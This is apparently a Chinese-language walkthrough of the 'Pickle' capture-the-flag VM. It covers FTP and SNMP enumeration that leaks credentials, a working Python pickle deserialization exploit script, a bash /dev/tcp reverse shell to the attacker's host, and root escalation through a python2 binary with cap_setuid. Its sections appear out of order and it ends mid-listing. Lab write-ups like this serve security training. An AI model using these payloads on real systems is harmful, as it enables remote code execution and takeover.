(remote) lucas@pickle:\/tmp$ passwd lucas\nChanging password for lucas.\nCurrent password: \nNew password: \n# lucas\nRetype new password: \nYou must choose a longer password\nNew password: \nRetype new password: \npasswd: password updated successfully\n# lucas123456<\/code><\/pre>\n<\/div><\/p>\npython\u7684capabilities\u6743\u9650\u63d0\u6743root<\/h2>\nmark@pickle:~$ ls -la\ntotal 3640\ndrwxr-x--- 4 mark mark 4096 Oct 12 2020 .\ndrwxr-xr-x 4 root root 4096 Oct 12 2020 ..\n-rw------- 1 mark mark 1 Oct 12 2020 .bash_history\n-rw-r--r-- 1 mark mark 220 Apr 18 2019 .bash_logout\n-rw-r--r-- 1 mark mark 3526 Apr 18 2019 .bashrc\ndrwx------ 3 mark mark 4096 Oct 12 2020 .gnupg\ndrwxr-xr-x 3 mark mark 4096 Oct 11 2020 .local\n-rw-r--r-- 1 mark mark 807 Apr 18 2019 .profile\n-rwxr-xr-x 1 root root 3689352 Oct 11 2020 python2\n-rw-r----- 1 mark mark 33 Oct 11 2020 user.txt\nmark@pickle:~$ cat user.txt \ne25fd1b9248d1786551e3412adc74f6f\nmark@pickle:~$ whereis python2\npython2: \/usr\/bin\/python2.7 \/usr\/bin\/python2.7-config \/usr\/bin\/python2 \/usr\/lib\/python2.7 \/etc\/python2.7 \/usr\/local\/lib\/python2.7 \/usr\/include\/python2.7 \/usr\/share\/man\/man1\/python2.1.gz\nmark@pickle:~$ ls -la \/usr\/bin\/python2.7\n-rwxr-xr-x 1 root root 3689352 Oct 10 2019 \/usr\/bin\/python2.7\nmark@pickle:~$ ls -la \/usr\/bin\/python2\nlrwxrwxrwx 1 root root 9 Mar 4 2019 \/usr\/bin\/python2 -> python2.7\nmark@pickle:~$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/bin\/pkexec\n\/usr\/bin\/gpasswd\n\/usr\/bin\/newgrp\n\/usr\/bin\/mount\n\/usr\/bin\/passwd\n\/usr\/bin\/chfn\n\/usr\/bin\/chsh\n\/usr\/bin\/umount\n\/usr\/bin\/su\nmark@pickle:~$ \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\nmark@pickle:~$ whereis getcap\ngetcap: \/usr\/bin\/getcap \/usr\/share\/man\/man8\/getcap.8.gz\nmark@pickle:~$ \/usr\/bin\/getcap -r \/ 2>\/dev\/null\n\/home\/mark\/python2 = cap_setuid+ep\n\/usr\/bin\/ping = cap_net_raw+ep<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u63d0\u6743\uff1ahttps:\/\/gtfobins.github.io\/gtfobins\/python\/#capabilities<\/a><\/p>\n<\/div><\/p>\nmark@pickle:~$ \/home\/mark\/python2 -c 'import os; os.setuid(0); os.system("\/bin\/bash")'<\/code><\/pre>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Pickle]\n\u2514\u2500$ rustscan -a $IP -- -sCV \n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nReal hackers hack time \u231b\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.105:21\nOpen 192.168.10.105:1337\n\nPORT STATE SERVICE REASON VERSION\n21\/tcp open ftp syn-ack vsftpd 3.0.3\n| ftp-syst: \n| STAT: \n| FTP server status:\n| Connected to ::ffff:192.168.10.102\n| Logged in as ftp\n| TYPE: ASCII\n| No session bandwidth limit\n| Session timeout in seconds is 300\n| Control connection is plain text\n| Data connections will be plain text\n| At session startup, client count was 3\n| vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n|_-rwxr-xr-x 1 0 0 1306 Oct 12 2020 init.py.bak\n1337\/tcp open http syn-ack Werkzeug httpd 1.0.1 (Python 2.7.16)\n| http-methods: \n|_ Supported Methods: HEAD GET POST OPTIONS\n|_http-server-header: Werkzeug\/1.0.1 Python\/2.7.16\n| http-auth: \n| HTTP\/1.0 401 UNAUTHORIZED\\x0D\n|_ Basic realm=Pickle login\n|_http-title: Site doesn't have a title (text\/html; charset=utf-8).\nService Info: OS: Unix<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u654f\u611f\u7aef\u53e3\u6d4b\u8bd5<\/h3>\n
\u67e5\u770b\u4e00\u4e0bftp<\/code>\u670d\u52a1\u5185\u5bb9\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Pickle]\n\u2514\u2500$ ftp $IP\nConnected to 192.168.10.105.\n220 (vsFTPd 3.0.3)\nName (192.168.10.105:kali): anonymous\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> dir\n229 Entering Extended Passive Mode (|||6295|)\n150 Here comes the directory listing.\n-rwxr-xr-x 1 0 0 1306 Oct 12 2020 init.py.bak\n226 Directory send OK.\nftp> get init.py.bak\nlocal: init.py.bak remote: init.py.bak\n229 Entering Extended Passive Mode (|||31148|)\n150 Opening BINARY mode data connection for init.py.bak (1306 bytes).\n100% |************************************************************************************************************************************************| 1306 32.87 KiB\/s 00:00 ETA\n226 Transfer complete.\n1306 bytes received in 00:00 (31.28 KiB\/s)\nftp> exit\n221 Goodbye.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Pickle]\n\u2514\u2500$ cat init.py.bak \nfrom functools import wraps\nfrom flask import *\nimport hashlib\nimport socket\nimport base64\nimport pickle\nimport hmac\n\napp = Flask(__name__, template_folder="templates", static_folder="\/opt\/project\/static\/")\n\n@app.route('\/', methods=["GET", "POST"])\ndef index_page():\n '''\n __index_page__()\n '''\n if request.method == "POST" and request.form["story"] and request.form["submit"]:\n md5_encode = hashlib.md5(request.form["story"]).hexdigest()\n paths_page = "\/opt\/project\/uploads\/%s.log" %(md5_encode)\n write_page = open(paths_page, "w")\n write_page.write(request.form["story"])\n\n return "The message was sent successfully!"\n\n return render_template("index.html")\n\n@app.route('\/reset', methods=["GET", "POST"])\ndef reset_page():\n '''\n __reset_page__()\n '''\n pass\n\n@app.route('\/checklist', methods=["GET", "POST"])\ndef check_page():\n '''\n __check_page__()\n '''\n if request.method == "POST" and request.form["check"]:\n path_page = "\/opt\/project\/uploads\/%s.log" %(request.form["check"])\n open_page = open(path_page, "rb").read()\n if "p1" in open_page:\n open_page = pickle.loads(open_page)\n return str(open_page)\n else:\n return open_page\n else:\n return "Server Error!"\n\n return render_template("checklist.html")\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=1337, debug=True)<\/code><\/pre>\n\u8e29\u70b9\uff0c\u53d1\u73b0\u5b58\u5728\u9a8c\u8bc1\uff1a<\/p>\n
<\/div><\/p>\n\u6ca1\u6709\u5176\u4ed6\u7684\u529e\u6cd5\uff0c\u5c1d\u8bd5\u7206\u7834\uff0c\u4f46\u662f\u672a\u679c\u3002<\/p>\n
UDP\u670d\u52a1\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Pickle]\n\u2514\u2500$ sudo nmap -sU -top 100 $IP \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-09-12 04:01 EDT\nStats: 0:02:05 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan\nUDP Scan Timing: About 99.99% done; ETC: 04:04 (0:00:00 remaining)\nNmap scan report for 192.168.10.105\nHost is up (0.00089s latency).\nNot shown: 96 closed udp ports (port-unreach)\nPORT STATE SERVICE\n68\/udp open|filtered dhcpc\n161\/udp open snmp\n631\/udp open|filtered ipp\n5353\/udp open|filtered zeroconf\nMAC Address: 08:00:27:C5:BC:73 (Oracle VirtualBox virtual NIC)<\/code><\/pre>\n\u68c0\u67e5\u4e00\u4e0bsnmp<\/code>\u670d\u52a1\uff0c\u67e5\u770b\u4e00\u4e0b\u6709\u5565\u547d\u4ee4\uff1ahttps:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-snmp#enumerating-snmp<\/a><\/p>\n\u5c1d\u8bd5\u68c0\u7d22\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Pickle]\n\u2514\u2500$ snmpwalk -v X -c public $IP \nInvalid version specified after -v flag: X\nUSAGE: snmpwalk [OPTIONS] AGENT [OID]\n\n Version: 5.9.4.pre2\n Web: http:\/\/www.net-snmp.org\/\n Email: net-snmp-coders@lists.sourceforge.net\n\nOPTIONS:\n -h, --help display this help message\n -H display configuration file directives understood\n -v 1|2c|3 specifies SNMP version to use\n -V, --version display package version number\nSNMP Version 1 or 2c specific\n -c COMMUNITY set the community string\nSNMP Version 3 specific\n -a PROTOCOL set authentication protocol (MD5|SHA|SHA-224|SHA-256|SHA-384|SHA-512)\n -A PASSPHRASE set authentication protocol pass phrase\n -e ENGINE-ID set security engine ID (e.g. 800000020109840301)\n -E ENGINE-ID set context engine ID (e.g. 800000020109840301)\n -l LEVEL set security level (noAuthNoPriv|authNoPriv|authPriv)\n -n CONTEXT set context name (e.g. bridge1)\n -u USER-NAME set security name (e.g. bert)\n -x PROTOCOL set privacy protocol (DES|AES|AES-192|AES-256)\n -X PASSPHRASE set privacy protocol pass phrase\n -Z BOOTS,TIME set destination engine boots\/time\nGeneral communication options\n -r RETRIES set the number of retries\n -t TIMEOUT set the request timeout (in seconds)\nDebugging\n -d dump input\/output packets in hexadecimal\n -D[TOKEN[,...]] turn on debugging output for the specified TOKENs\n (ALL gives extremely verbose debugging output)\nGeneral options\n -m MIB[:...] load given list of MIBs (ALL loads everything)\n -M DIR[:...] look in given list of directories for MIBs\n (default: $HOME\/.snmp\/mibs:\/usr\/share\/snmp\/mibs:\/usr\/share\/snmp\/mibs\/iana:\/usr\/share\/snmp\/mibs\/ietf)\n -P MIBOPTS Toggle various defaults controlling MIB parsing:\n u: allow the use of underlines in MIB symbols\n c: disallow the use of "--" to terminate comments\n d: save the DESCRIPTIONs of the MIB objects\n e: disable errors when MIB symbols conflict\n w: enable warnings when MIB symbols conflict\n W: enable detailed warnings when MIB symbols conflict\n R: replace MIB symbols from latest module\n -O OUTOPTS Toggle various defaults controlling output display:\n 0: print leading 0 for single-digit hex characters\n a: print all strings in ascii format\n b: do not break OID indexes down\n e: print enums numerically\n E: escape quotes in string indices\n f: print full OIDs on output\n n: print OIDs numerically\n p PRECISION: display floating point values with specified PRECISION (printf format string)\n q: quick print for easier parsing\n Q: quick print with equal-signs\n s: print only last symbolic element of OID\n S: print MIB module-id plus last element\n t: print timeticks unparsed as numeric integers\n T: print human-readable text along with hex strings\n u: print OIDs using UCD-style prefix suppression\n U: don't print units\n v: print values only (not OID = value)\n x: print all strings in hex format\n X: extended index format\n -I INOPTS Toggle various defaults controlling input parsing:\n b: do best\/regex matching to find a MIB node\n h: don't apply DISPLAY-HINTs\n r: do not check values for range\/type legality\n R: do random access to OID labels\n u: top-level OIDs must have '.' prefix (UCD-style)\n s SUFFIX: Append all textual OIDs with SUFFIX before parsing\n S PREFIX: Prepend all textual OIDs with PREFIX before parsing\n -L LOGOPTS Toggle various defaults controlling logging:\n e: log to standard error\n o: log to standard output\n n: don't log at all\n f file: log to the specified file\n s facility: log to syslog (via the specified facility)\n\n (variants)\n [EON] pri: log to standard error, output or \/dev\/null for level 'pri' and above\n [EON] p1-p2: log to standard error, output or \/dev\/null for levels 'p1' to 'p2'\n [FS] pri token: log to file\/syslog for level 'pri' and above\n [FS] p1-p2 token: log to file\/syslog for levels 'p1' to 'p2'\n -C APPOPTS Set various application specific behaviours:\n p: print the number of variables found\n i: include given OID in the search range\n I: don't include the given OID, even if no results are returned\n c: do not check returned OIDs are increasing\n t: Display wall-clock time to complete the walk\n T: Display wall-clock time to complete each request\n E {OID}: End the walk at the specified OID\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Pickle]\n\u2514\u2500$ snmpwalk -v 1 -c public $IP \niso.3.6.1.2.1.1.1.0 = STRING: "Linux pickle 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64"\niso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10\niso.3.6.1.2.1.1.3.0 = Timeticks: (121922) 0:20:19.22\niso.3.6.1.2.1.1.4.0 = STRING: "lucas:SuperSecretPassword123!"\niso.3.6.1.2.1.1.5.0 = STRING: "pickle"\niso.3.6.1.2.1.1.6.0 = STRING: "Sitting on the Dock of the Bay"\niso.3.6.1.2.1.1.7.0 = INTEGER: 72\niso.3.6.1.2.1.1.8.0 = Timeticks: (57) 0:00:00.57\niso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.11.3.1.1\niso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.15.2.1.1\niso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.10.3.1.1\niso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1\niso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1\niso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49\niso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.4\niso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.50\niso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3\niso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92\niso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB for Message Processing and Dispatching."\niso.3.6.1.2.1.1.9.1.3.2 = STRING: "The management information definitions for the SNMP User-based Security Model."\niso.3.6.1.2.1.1.9.1.3.3 = STRING: "The SNMP Management Architecture MIB."\niso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"\niso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."\niso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"\niso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing IP and ICMP implementations"\niso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing UDP implementations"\niso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."\niso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."\niso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (55) 0:00:00.55\niso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (55) 0:00:00.55\niso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (55) 0:00:00.55\niso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (55) 0:00:00.55\niso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (55) 0:00:00.55\niso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (55) 0:00:00.55\niso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (55) 0:00:00.55\niso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (55) 0:00:00.55\niso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (55) 0:00:00.55\niso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (57) 0:00:00.57\niso.3.6.1.2.1.25.1.1.0 = Timeticks: (122955) 0:20:29.55\niso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E8 09 0C 04 0E 02 00 2D 04 00 \niso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216\niso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=\/boot\/vmlinuz-4.19.0-11-amd64 root=UUID=1612bec5-c369-4a38-a5d9-61c9328c9afa ro quiet\n"\niso.3.6.1.2.1.25.1.5.0 = Gauge32: 0\niso.3.6.1.2.1.25.1.6.0 = Gauge32: 68\niso.3.6.1.2.1.25.1.7.0 = INTEGER: 0\nEnd of MIB<\/code><\/pre>\n\u627e\u5230\u4e00\u7ec4\u5bc6\u94a5\uff1a<\/p>\n
lucas\nSuperSecretPassword123!<\/code><\/pre>\n\u5f53\u6210\u8d26\u53f7\u5bc6\u7801\u53d1\u73b0\u53ef\u4ee5\u767b\u5f551337<\/code>\u7aef\u53e3\uff1a<\/p>\n<\/div><\/p>\n\u8def\u7531\u5206\u6790<\/h3>\n
\u6e90\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n
from functools import wraps\nfrom flask import *\nimport hashlib\nimport socket\nimport base64\nimport pickle\nimport hmac\n\napp = Flask(__name__, template_folder="templates", static_folder="\/opt\/project\/static\/")\n\n@app.route('\/', methods=["GET", "POST"])\ndef index_page():\n '''\n __index_page__()\n '''\n if request.method == "POST" and request.form["story"] and request.form["submit"]: \n # \u68c0\u67e5 POST \u6570\u636e\u4e2d\u4e2d\u7684 `story` \u548c `submit` \u4e24\u4e2a\u53d8\u91cf\n md5_encode = hashlib.md5(request.form["story"]).hexdigest()\n # md5 \u52a0\u5bc6 story \u7684\u6570\u636e\n paths_page = "\/opt\/project\/uploads\/%s.log" %(md5_encode)\n write_page = open(paths_page, "w")\n write_page.write(request.form["story"])\n # \u8bb0\u5f55\u65e5\u5fd7\u4fe1\u606f\n\n return "The message was sent successfully!"\n\n return render_template("index.html")\n\n@app.route('\/reset', methods=["GET", "POST"])\ndef reset_page():\n '''\n __reset_page__()\n '''\n pass\n\n@app.route('\/checklist', methods=["GET", "POST"])\ndef check_page():\n '''\n __check_page__()\n '''\n if request.method == "POST" and request.form["check"]:\n path_page = "\/opt\/project\/uploads\/%s.log" %(request.form["check"])\n open_page = open(path_page, "rb").read()\n if "p1" in open_page:\n # \u5982\u679c p1 \u5b57\u6bb5\u5b58\u5728\uff0c\u5219\u53cd\u5e8f\u5217\u5316\n open_page = pickle.loads(open_page)\n return str(open_page)\n else:\n return open_page\n else:\n return "Server Error!"\n\n return render_template("checklist.html")\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=1337, debug=True)<\/code><\/pre>\n\u5b58\u5728\u4e09\u7ec4\u8def\u7531\uff1a<\/p>\n
\n\/<\/code><\/li>\n\/reset<\/code><\/li>\n\/checklist<\/code><\/li>\n<\/ul>\n\u591a\u7684\u4e0d\u89e3\u91ca\u4e86\uff0c\u8fd9\u4e2a\u903b\u8f91\u770b\u8d77\u6765\u4e0d\u96be\uff0c\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Pickle]\n\u2514\u2500$ curl -s -u 'lucas:SuperSecretPassword123!' http:\/\/192.168.10.105:1337\/ -d "story=hgbe02"\n..........\n<!--\n\nTraceback (most recent call last):\n File "\/usr\/local\/lib\/python2.7\/dist-packages\/flask\/app.py", line 2464, in __call__\n return self.wsgi_app(environ, start_response)\n File "\/usr\/local\/lib\/python2.7\/dist-packages\/flask\/app.py", line 2450, in wsgi_app\n response = self.handle_exception(e)\n File "\/usr\/local\/lib\/python2.7\/dist-packages\/flask\/app.py", line 1867, in handle_exception\n reraise(exc_type, exc_value, tb)\n File "\/usr\/local\/lib\/python2.7\/dist-packages\/flask\/app.py", line 2447, in wsgi_app\n response = self.full_dispatch_request()\n File "\/usr\/local\/lib\/python2.7\/dist-packages\/flask\/app.py", line 1952, in full_dispatch_request\n rv = self.handle_user_exception(e)\n File "\/usr\/local\/lib\/python2.7\/dist-packages\/flask\/app.py", line 1821, in handle_user_exception\n reraise(exc_type, exc_value, tb)\n File "\/usr\/local\/lib\/python2.7\/dist-packages\/flask\/app.py", line 1950, in full_dispatch_request\n rv = self.dispatch_request()\n File "\/usr\/local\/lib\/python2.7\/dist-packages\/flask\/app.py", line 1936, in dispatch_request\n return self.view_functions[rule.endpoint](**req.view_args)\n File "\/opt\/project\/project.py", line 30, in decorated\n return f(*args, **kwargs)\n File "\/opt\/project\/project.py", line 39, in index_page\n if request.method == "POST" and request.form["story"] and request.form["submit"]:\n File "\/usr\/local\/lib\/python2.7\/dist-packages\/werkzeug\/datastructures.py", line 442, in __getitem__\n raise exceptions.BadRequestKeyError(key)\nBadRequestKeyError: 400 Bad Request: The browser (or proxy) sent a request that this server could not understand.\nKeyError: 'submit'\n\n-->\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Pickle]\n\u2514\u2500$ curl -s -u 'lucas:SuperSecretPassword123!' http:\/\/192.168.10.105:1337\/ -d "story=hgbe02&submit=%E6%8F%90%E4%BA%A4"\nThe message was sent successfully!\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Pickle]\n\u2514\u2500$ echo -n 'hgbe02' | md5sum \n105abaedc26fb12d3fd5440a6ea8e27c -\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Pickle]\n\u2514\u2500$ curl -s -u 'lucas:SuperSecretPassword123!' http:\/\/192.168.10.105:1337\/checklist -d "check=105abaedc26fb12d3fd5440a6ea8e27c" \nhgbe02<\/code><\/pre>\n\u901a\u8fc7\u62a5\u9519\uff0c\u53d1\u73b0python\u7248\u672c\u4e3apython2.7<\/code>\uff0c\u540c\u65f6\u4e5f\u53ef\u4ee5\u4f7f\u7528md5\u627e\u5230\u6587\u4ef6\uff01<\/p>\npickle\u5229\u7528<\/h3>\n
\u5c1d\u8bd5\u8fdb\u884c\u53cd\u5e8f\u5217\u5316\u5229\u7528\uff0c\u8fd9\u91cc\u76f4\u63a5\u5f15\u7528\u522b\u7684\u5e08\u5085\u5199\u597d\u7684\u811a\u672c\u8fa3\uff1a<\/p>\n
#coding:utf-8\nimport os\nimport cPickle\nimport hashlib\nimport requests\n\nclass CommandExecute(object):\n def __reduce__(self):\n return (os.system, ('ping -c 1 192.168.10.102',))\n\nconvert_data = cPickle.dumps(CommandExecute())\nconvert_crypt = hashlib.md5(convert_data).hexdigest()\nsend_requests = requests.post('http:\/\/192.168.10.105:1337\/', data={"story":convert_data, "submit":"Submit+Query"}, auth=("lucas", "SuperSecretPassword123!"))\ncheck_requests = requests.post('http:\/\/192.168.10.105:1337\/checklist', data={"check":convert_crypt}, auth=("lucas", "SuperSecretPassword123!"))\nprint(check_requests.text)<\/code><\/pre>\n\u591a\u6b21\u8fd0\u884c\u53d1\u73b0\u53ef\u4ee5ping\u6210\u529f\uff01<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Pickle]\n\u2514\u2500$ python2 exp.py 2>\/dev\/null\n0\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Pickle]\n\u2514\u2500$ sudo tcpdump -i eth1 icmp \ntcpdump: verbose output suppressed, use -v[v]... for full protocol decode\nlistening on eth1, link-type EN10MB (Ethernet), snapshot length 262144 bytes\n05:20:44.205898 IP 192.168.10.105 > 192.168.10.102: ICMP echo request, id 491, seq 1, length 64\n05:20:44.205941 IP 192.168.10.102 > 192.168.10.105: ICMP echo reply, id 491, seq 1, length 64\n05:21:08.452970 IP 192.168.10.105 > 192.168.10.102: ICMP echo request, id 495, seq 1, length 64\n05:21:08.452988 IP 192.168.10.102 > 192.168.10.105: ICMP echo reply, id 495, seq 1, length 64<\/code><\/pre>\n\u4fee\u6539\u76f8\u5173\u547d\u4ee4\uff0c\u53cd\u5f39shell\uff01<\/p>\n
bash -c "exec bash -i &>\/dev\/tcp\/192.168.10.102\/1234 <&1"<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) lucas@pickle:\/home\/lucas$ whoami;id\nlucas\nuid=1000(lucas) gid=1000(lucas) groups=1000(lucas),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),115(lpadmin),116(scanner)\n(remote) lucas@pickle:\/home\/lucas$ ls -la\ntotal 32\ndrwxr-xr-x 3 lucas lucas 4096 Oct 11 2020 .\ndrwxr-xr-x 4 root root 4096 Oct 12 2020 ..\n-rw------- 1 lucas lucas 1 Oct 12 2020 .bash_history\n-rw-r--r-- 1 lucas lucas 220 Oct 11 2020 .bash_logout\n-rw-r--r-- 1 lucas lucas 3526 Oct 11 2020 .bashrc\ndrwxr-xr-x 3 lucas lucas 4096 Oct 11 2020 .local\n-rw-r--r-- 1 lucas lucas 807 Oct 11 2020 .profile\n-rw-r--r-- 1 lucas lucas 66 Oct 11 2020 .selected_editor\n(remote) lucas@pickle:\/home\/lucas$ sudo -l\nbash: sudo: command not found\n(remote) lucas@pickle:\/home\/lucas$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/bin\/pkexec\n\/usr\/bin\/gpasswd\n\/usr\/bin\/newgrp\n\/usr\/bin\/mount\n\/usr\/bin\/passwd\n\/usr\/bin\/chfn\n\/usr\/bin\/chsh\n\/usr\/bin\/umount\n\/usr\/bin\/su\n(remote) lucas@pickle:\/home\/lucas$ cd \/opt\n(remote) lucas@pickle:\/opt$ ls -la\ntotal 12\ndrwxr-xr-x 3 root root 4096 Oct 11 2020 .\ndrwxr-xr-x 18 root root 4096 Oct 11 2020 ..\ndrwxr-xr-x 5 root root 4096 Oct 12 2020 project\n(remote) lucas@pickle:\/opt$ cd project\/\n(remote) lucas@pickle:\/opt\/project$ ls -la\ntotal 24\ndrwxr-xr-x 5 root root 4096 Oct 12 2020 .\ndrwxr-xr-x 3 root root 4096 Oct 11 2020 ..\n-rwxr-xr-x 1 root root 2654 Oct 12 2020 project.py\ndrwxr-xr-x 4 root root 4096 Oct 11 2020 static\ndrwxr-xr-x 2 root root 4096 Oct 11 2020 templates\ndrwxrwxrwx 2 root root 4096 Sep 12 05:28 uploads\n(remote) lucas@pickle:\/opt\/project$ cat project.py \nfrom functools import wraps\nfrom flask import *\nimport hashlib\nimport socket\nimport base64\nimport pickle\nimport hmac\n\napp = Flask(__name__, template_folder="templates", static_folder="\/opt\/project\/static\/")\n\ndef check_auth(username, password):\n """This function is called to check if a username \/\n password combination is valid.\n """\n return username == 'lucas' and password == 'SuperSecretPassword123!'\n\ndef authenticate():\n """Sends a 401 response that enables basic auth"""\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm="Pickle login"'})\n\ndef requires_auth(f):\n @wraps(f)\n def decorated(*args, **kwargs):\n auth = request.authorization\n if not auth or not check_auth(auth.username, auth.password):\n return authenticate()\n return f(*args, **kwargs)\n return decorated\n\n@app.route('\/', methods=["GET", "POST"])\n@requires_auth\ndef index_page():\n '''\n __index_page__()\n '''\n if request.method == "POST" and request.form["story"] and request.form["submit"]:\n md5_encode = hashlib.md5(request.form["story"]).hexdigest()\n paths_page = "\/opt\/project\/uploads\/%s.log" %(md5_encode)\n write_page = open(paths_page, "w")\n write_page.write(request.form["story"])\n\n return "The message was sent successfully!"\n\n return render_template("index.html")\n\n@app.route('\/reset', methods=["GET", "POST"])\n@requires_auth\ndef reset_page():\n '''\n __reset_page__()\n '''\n if request.method == "POST" and request.form["username"] and request.form["key"]:\n key = "dpff43f3p214k31301"\n raw = request.form["username"] + key + socket.gethostbyname(socket.gethostname())\n hashed = hmac.new(key, raw, hashlib.sha1)\n if request.form["key"] == hashed.hexdigest():\n return base64.b64encode(hashed.digest().encode("base64").rstrip("\\n"))\n else:\n return "Server Error!"\n return render_template("reset.html")\n\n@app.route('\/checklist', methods=["GET", "POST"])\n@requires_auth\ndef check_page():\n '''\n __check_page__()\n '''\n if request.method == "POST" and request.form["check"]:\n path_page = "\/opt\/project\/uploads\/%s.log" %(request.form["check"])\n open_page = open(path_page, "rb").read()\n if "p1" in open_page:\n open_page = pickle.loads(open_page)\n return str(open_page)\n else:\n return open_page\n else:\n return "Server Error!"\n\n return render_template("checklist.html")\n\n@app.route('\/console')\n@requires_auth\ndef secret_page():\n return "Server Error!"\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=1337, debug=True)\n(remote) lucas@pickle:\/opt\/project$ cd uploads\n(remote) lucas@pickle:\/opt\/project\/uploads$ ls -la\ntotal 28\ndrwxrwxrwx 2 root root 4096 Sep 12 05:28 .\ndrwxr-xr-x 5 root root 4096 Oct 12 2020 ..\n-rw-r--r-- 1 lucas lucas 6 Sep 12 04:32 105abaedc26fb12d3fd5440a6ea8e27c.log\n-rw-r--r-- 1 lucas lucas 58 Sep 12 05:21 110207bbd89a69ddcf2b2aebb3b380d5.log\n-rw-r--r-- 1 lucas lucas 91 Sep 12 05:28 8c809790306c09de2a350426a25d7de3.log\n-rw-r--r-- 1 lucas lucas 4 Sep 12 04:24 b59c67bf196a4758191e42f76670ceba.log\n-rw-r--r-- 1 lucas lucas 9 Sep 12 04:24 